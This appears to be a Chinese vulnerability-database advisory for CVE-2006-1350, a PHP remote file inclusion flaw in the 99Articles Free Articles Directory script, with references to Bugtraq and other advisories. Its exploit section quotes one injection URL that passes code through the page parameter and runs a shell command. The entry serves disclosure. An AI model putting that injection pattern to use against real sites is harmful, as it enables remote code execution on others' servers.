Free文章目录页面参数目录远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1195661 漏洞类型 输入验证
发布时间 2006-03-21 更新时间 2006-03-23
CVE编号 CVE-2006-1350 CNNVD-ID CNNVD-200603-364
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2006030104
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200603-364
|漏洞详情
在99Articles.com(又称ArticlesOne.com)Free文章目录的index.php中存在PHP远程文件包含漏洞,远程攻击者可通过一个位于page参数中的URL地址,包含和执行任意PHP代码。
|漏洞EXP
Web Site : http://www.99articles.com
Script Demo Site : http://www.articlesone.com

General :

1. Support rssfeed (XML) to distribute articles for others website and blogs. It will make grow website popularity

2. Newsletter to be growing visitors

3. Membership system for writer participants submit their articles

4. Top Articles list, Top Authors list, Most Popular Articles list

5. Article categories

6. Search engine friendly. Php generate articles page as html, etc

Admin :

1. Webbased control panel

2. Categories management

3. Articles management --> You can approve articles from writer

4. Search members and articles

5. Static page editor

6. Re-brand your website, change logo and website name

7. Easy integrated with Google Adsense to earn money

8. Two leve user management. Create super admin to be handle overall and create admin to approve articles.

Vulnerable :

http://www.example.com/index.php?page=evilcode?&cmd=uname -a

Patriotic Hackers in the name of Botan

Kurdish Defacerz ruLez.

www.PatrioticHackers.com

irc.gigachat.net #kurdhack
|参考资料

来源:BUGTRAQ
名称:20060321FreeArticlesDirectoryRemoteCommandExucetion
链接:http://www.securityfocus.com/archive/1/archive/1/428354/100/0/threaded
来源:XF
名称:freearticlesdirectory-index-file-include(25378)
链接:http://xforce.iss.net/xforce/xfdb/25378
来源:BID
名称:17183
链接:http://www.securityfocus.com/bid/17183
来源:OSVDB
名称:24024
链接:http://www.osvdb.org/24024
来源:VUPEN
名称:ADV-2006-1037
链接:http://www.frsirt.com/english/advisories/2006/1037
来源:SREASON
名称:616
链接:http://securityreason.com/securityalert/616
来源:SECUNIA
名称:19320
链接:http://secunia.com/advisories/19320
来源:VIM
名称:20060322FreeArticlesDirectory-fileinclusion,codeexecution?
链接:http://attrition.org/pipermail/vim/2006-March/000626.html